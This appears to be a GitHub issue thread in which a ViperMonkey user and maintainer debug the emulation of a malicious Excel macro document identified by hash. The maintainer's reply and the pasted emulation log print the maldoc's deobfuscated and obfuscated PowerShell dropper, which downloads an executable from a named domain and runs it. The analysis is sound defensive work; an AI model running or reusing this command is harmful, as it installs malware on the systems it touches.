kirk-sayre-work
commented
6 years ago Could you please post the hash of the original document?
Open tkfm-github opened 6 years ago
kirk-sayre-work
commented
6 years ago Could you please post the hash of the original document?
tkfm-github
commented
6 years ago thx for reply.
this is sha256hash f995c469b821bf1c60f0b00afced3e0c0aa19badb9dae2033b9f5c04dcf3ba5c
you can download from here if you have an account. https://www.hybrid-analysis.com/sample/f995c469b821bf1c60f0b00afced3e0c0aa19badb9dae2033b9f5c04dcf3ba5c?environmentId=100
kirk-sayre-work
commented
6 years ago Thanks for posting the hash. The fixes have been made in my ViperMonkey development fork https://github.com/kirk-sayre-work/ViperMonkey to analyze this document. I added some stubbed CheckSpelling() support to handle the interesting use of CheckSpelling() in the doc.
This doc winds up running (after to PowerShell deobfuscation) (new-object system.net.webclient).downloadfile('http[:]//ramelograna[.]com/splugin.exe','ppguvq.exe');start-process 'ppguvq.exe'
tkfm-github
commented
6 years ago thanks a lot ! I tried your fix , but still got some errors. log and result is below. ''' TRACING VBA CODE (entrypoint = Auto*): INFO ACTION: Found Entry Point - params 'workbook_open' - ERROR Variable 'siglnimgSignedValid' not found INFO calling Function: Left('external hard', 2) INFO calling Function: Right('free ', 2) INFO calling Function: Right('setter', 4) INFO calling Function: Left('tter', 2) INFO calling Function: Rnd() INFO calling Function: Int(6.241525775553681) INFO calling Function: Rnd() INFO calling Function: Int(112.7541883329977) INFO calling Function: Rnd() INFO calling Function: Int(117.71663287889672) INFO calling Function: Rnd() INFO calling Function: Int(99.853607251328) INFO calling Function: Rnd() INFO calling Function: Int(104.84977434994758) INFO calling Function: Rnd() INFO calling Function: Int(119.02764032037439) INFO calling Function: Rnd() INFO calling Function: Int(122.06981814741806) INFO calling Function: CheckSpelling('puchwz') INFO calling Function: Left('"english" news', 1) ERROR Variable 'RibbonControlSizeRegular' not found INFO Calling Procedure: Shell('[\'cMD.exe /c "po^w^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FI...') INFO Shell('cMD.exe /c "po^w^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=\'\'\',\'\'\';$hit=\'dfil\';$fd=\');sta\';$dr=\'(ne\';$ed=\'ject \';$ipo=\'syst\';$kos=\'t.we\';$rem=\'ent).do\';$sad=\'wnloa\';$kp=\'w-ob\';$nim=\'e(\'\'\';$mo=\'\';$uy=\'puchwz\';$ji=\'.ex\';$pol=\'em.ne\';$oe=\'e\'\'\';$jik=\'rt-pro\';$naw=\'cess \'\'\';$lim=\'bcli\';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+\'http://ramelograna.com/splugin.exe\'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"') INFO ACTION: Execute Command - params 'cMD.exe /c "po^w^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=\'\'\',\'\'\';$hit=\'dfil\';$fd=\');sta\';$dr=\'(ne\';$ed=\'ject \';$ipo=\'syst\';$kos=\'t.we\';$rem=\'ent).do\';$sad=\'wnloa\';$kp=\'w-ob\';$nim=\'e(\'\'\';$mo=\'\';$uy=\'puchwz\';$ji=\'.ex\';$pol=\'em.ne\';$oe=\'e\'\'\';$jik=\'rt-pro\';$naw=\'cess \'\'\';$lim=\'bcli\';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+\'http://ramelograna.com/splugin.exe\'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"' - Shell function Recorded Actions: +-------------------+---------------------------+----------------+ | Action | Parameters | Description | +-------------------+---------------------------+----------------+ | Found Entry Point | workbook_open | | | Execute Command | cMD.exe /c | Shell function | | | "po^w^ERS^hel^l^.e^x^e^ | | | | -nO^l -No^Ni^Nt^ | | | | -W^InDO^ws^ 1 | | | | -NoprO^FIle^ -eX^Ec^U | | | | B^Ypa^S^s $fos=''',''';$h | | | | it='dfil';$fd=');sta';$dr | | | | ='(ne';$ed='ject ';$ipo=' | | | | syst';$kos='t.we';$rem='e | | | | nt).do';$sad='wnloa';$kp= | | | | 'w-ob';$nim='e(''';$mo='' | | | | ;$uy='puchwz';$ji='.ex';$ | | | | pol='em.ne';$oe='e''';$ji | | | | k='rt-pro';$naw='cess | | | | ''';$lim='bcli';Invoke-Ex | | | | pression($dr+$kp+$ed+$ipo | | | | +$pol+$kos+$lim+$rem+$sad | | | | +$hit+$nim+'http://ramelo | | | | grana.com/splugin.exe'+$f | | | | os+$mo+$uy+$ji+$oe+$fd+$j | | | | ik+$naw+$mo+$uy+$ji+$oe)" | | +-------------------+---------------------------+----------------+ ''' any ideas ? or my environment something wrong ?
Python 2.7.12 (ubuntu16.04.4) ViperMonkey: commit: eb5f2f9599b135628ecc4efc6c95f3b9ccf46eee pyparsing==2.2.0 oletools==0.52.1
kirk-sayre-work
commented
6 years ago The errors you are seeing are from variable reads of builtin VBA variables that currently ViperMonkey does not support. I've been adding in support for these variables when I find maldocs that fail to analyze due to the missing variables on an as needed basis. In many cases ViperMonkey prints errors about missing variables but still successfully computes the final malicious commands executed by the VBA. For maldoc f995c469b821bf1c60f0b00afced3e0c0aa19badb9dae2033b9f5c04dcf3ba5c ViperMonkey gets the final command run, so I'm going to put adding those missing variables low (for now) on the priority stack.
If you find some maldocs that ViperMonkey fails to compute the final commands executed due to missing variables, please let me know.
Hi, I love your tool , but got "Expected end of text" exception.
log is here.
PARSING VBA CODE: INFO parsed Function sarneoolop (): 4 statement(s) INFO parsed Function zygotosfoot (): 1 statement(s) INFO parsed Function underfelles (): 1 statement(s) INFO parsed Sub Workbook_Open (): 1 statement(s) INFO parsed Function beerlonger (): 2 statement(s) INFO parsed Function tentengole (): 7 statement(s) INFO parsed Function herjioolokd (): 1 statement(s) INFO parsed Function manmandeep (): 3 statement(s) INFO parsed Function vellageteek (): 1 statement(s) Module None Sub Workbook_Open (): 1 statement(s) Function beerlonger (): 2 statement(s) Function zygotosfoot (): 1 statement(s) Function tentengole (): 7 statement(s) Function herjioolokd (): 1 statement(s) Function vellageteek (): 1 statement(s) Function manmandeep (): 3 statement(s) Function underfelles (): 1 statement(s) Function sarneoolop (): 4 statement(s)
Function catdogcat() ^ Expected end of text (at char 1879), (line:48, col:1)
TRACING VBA CODE (entrypoint = Auto*): Recorded Actions: +--------+------------+-------------+ | Action | Parameters | Description | +--------+------------+-------------+ +--------+------------+-------------+
and macro is here.
test.txt
environment is here.
vipermonkey==0.5 pyparsing==2.2.0 oletools==0.52.1
can you help me ?